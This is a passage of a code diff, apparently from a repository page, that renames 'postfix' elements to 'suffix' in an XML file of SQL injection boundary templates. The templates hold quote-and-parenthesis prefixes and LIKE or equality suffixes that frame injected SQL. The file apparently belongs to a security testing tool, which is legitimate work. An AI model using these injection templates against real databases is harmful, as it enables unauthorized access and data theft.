</case>
|
</case>
|
||||||
<case name="likesingle" desc="LIKE single quoted string">
|
<case name="likesingle" desc="LIKE single quoted string">
|
||||||
|
@ -38,7 +38,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format="'%s " params="')' * parenthesis"/>
|
<prefix format="'%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s'%s' LIKE '%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
<suffix format=" %s %s'%s' LIKE '%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
<case name="stringdouble" desc="double quoted string">
|
<case name="stringdouble" desc="double quoted string">
|
||||||
|
@ -48,7 +48,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format=""%s " params="')' * parenthesis"/>
|
<prefix format=""%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s"%s"="%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
<suffix format=" %s %s"%s"="%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
<case name="likedouble" desc="LIKE double quoted string">
|
<case name="likedouble" desc="LIKE double quoted string">
|
||||||
|
@ -58,7 +58,7 @@
|
||||||
</test>
|
</test>
|
||||||
<usage>
|
<usage>
|
||||||
<prefix format=""%s " params="')' * parenthesis"/>
|
<prefix format=""%s " params="')' * parenthesis"/>
|
||||||
<postfix format=" %s %s"%s" LIKE "%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
<suffix format=" %s %s"%s" LIKE "%s" params="logic, '(' * parenthesis, randStr, randStr"/>
|
||||||
</usage>
|
</usage>
|
||||||
</case>
|
</case>
|
||||||
</root>
|
</root>
|
||||||
|
|
Loading…
Reference in New Issue
Block a user